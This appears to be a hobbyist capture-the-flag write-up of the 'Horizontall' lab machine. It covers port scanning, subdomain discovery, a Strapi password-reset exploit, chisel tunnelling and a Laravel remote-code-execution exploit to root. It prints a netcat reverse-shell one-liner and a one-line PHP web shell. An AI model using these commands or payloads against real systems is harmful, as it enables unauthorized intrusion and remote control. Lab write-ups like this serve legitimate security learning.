Hack. Sleep. Repeat

View on GitHub


We always start with an nmap scan…..

nmap -p- --min-rate 10000 -oA nmap/allports -v IP
# Nmap 7.91 scan initiated Thu Dec 30 08:30:37 2021 as: nmap -p- --min-rate 10000 -oA nmap/allports -v
Warning: giving up on port because retransmission cap hit (10).
Increasing send delay for from 320 to 640 due to 570 out of 1899 dropped probes since last increase.
Increasing send delay for from 640 to 1000 due to 1398 out of 4658 dropped probes since last increase.
Nmap scan report for
Host is up (0.24s latency).
Not shown: 52107 closed ports, 13426 filtered ports
22/tcp open  ssh
80/tcp open  http

Read data files from: /usr/bin/../share/nmap
# Nmap done at Thu Dec 30 08:31:48 2021 -- 1 IP address (1 host up) scanned in 70.64 seconds

Interesting two open ports let throw some service detection and scripts switch on it to confirm what we have running on it we can already see it SSH and HTTP but let keep it flashy lol.

nmap -sC -sV -oA nmap/normal -p 22,80 IP
# Nmap 7.91 scan initiated Thu Dec 30 08:32:40 2021 as: nmap -sC -sV -oA nmap/normal -p 22,80
Nmap scan report for horizontall.htb (
Host is up (0.35s latency).

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
|   256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_  256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: horizontall
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
# Nmap done at Thu Dec 30 08:32:58 2021 -- 1 IP address (1 host up) scanned in 18.10 seconds

Now that is more flashy we are checking the HTTP first make sure to add IP and horizontall.htb to your host file.


Now next thing to do is to check the source page but we got nothing let burst some directories and subdomain to find some hidden page.

└─$ gobuster dir -u http://horizontall.htb/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,php,html,bak,sh -o gobuster.req
/index.html           (Status: 200) [Size: 901]
/img                  (Status: 301) [Size: 194] [--> http://horizontall.htb/img/]
/css                  (Status: 301) [Size: 194] [--> http://horizontall.htb/css/]
/js                   (Status: 301) [Size: 194] [--> http://horizontall.htb/js/]

But i got nothing on the domain let check subdomain.

└─$ gobuster vhost -u http://horizontall.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt  
Found: api-prod.horizontall.htb (Status: 200) [Size: 413]

Boom we got a subdomain which is cool add again to our host file now let access it to see what in store for us.


We got a welcome message and the rest is blank so i try adding /admin and the back of the subdomain you can also burst directories you will get it i just guess it and boom it work.


Seems we are dealing with strapi cms using some default credentials and we got no luck let see what we can find on google.



We found the version let confirm if the version is vulnerable.


Boom let download the exploit to try it out.

└─$ python3 http://api-prod.horizontall.htb/
[+] Checking Strapi CMS Version running
[+] Seems like the exploit will work!!!
[+] Executing exploit

[+] Password reset was successfully
[+] Your email is: admin@horizontall.htb
[+] Your new credentials are: admin:SuperStrongPassword1
[+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjQxMzAxNDYxLCJleHAiOjE2NDM4OTM0NjF9.50jv0hWWZ3KBCn-U0EIA2qNHkE7e4ddOrksf0yQuzbI


We are in but when i try to run a command i got some error.


Smooth let try to transfer the shell.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f

Ncat ready to catch the reverse shell.

└─$ nc -nvlp 1337 
listening on [any] 1337 ...


Boom more better let spawn a full tty shell.


Now let get the user.txt first.


Boom now let try to move our privilege.


Found a credentials but when i try to use it for the user developer i got no luck so let check for SUID .


Nothing also let check what ports we have running locally with us.

ss -tulpn


Boom we have a port let try to port forward using chisel first of all we need to transfer a copy of chisel binary to the target.


Now let start the server on our attacking machine.

./chisel server -p 9000 --reverse &


Now on the target.

./chisel client R:9001: &


We are ready to access it now.


Boom we found a Laravel v8 (PHP v7.4.18) version seems cool let confirm if it vulnerable.


Boom jackpot let give it a shot.

└─$ python3
[*] Try to use monolog_rce1 for exploitation.
[*] Result:
uid=0(root) gid=0(root) groups=0(root)

[*] Try to use monolog_rce2 for exploitation.
[*] Result:
uid=0(root) gid=0(root) groups=0(root)

[*] Try to use monolog_rce3 for exploitation.
[*] Result:
[-] RCE echo is not found.

Exploit working now let try to get a reverse shell let edit the exploit to wget our shell file to the server.

//Save in shell.php//

<?php system ($_GET['cmd']); ?>

Now let start our python server.

└─$ python -m SimpleHTTPServer                       
Serving HTTP on port 8000 ...


Now let save and run the exploit again.


Which confirm our file has been transfered let confirm it.


Flashy right hehehehehe let get a reverse shell back to our terminal now.


Bruhhhhhhhh you just got yourself a root you are l33t and thanks for reading my writeup between peace out.

Greeting From Muzec

Back To Home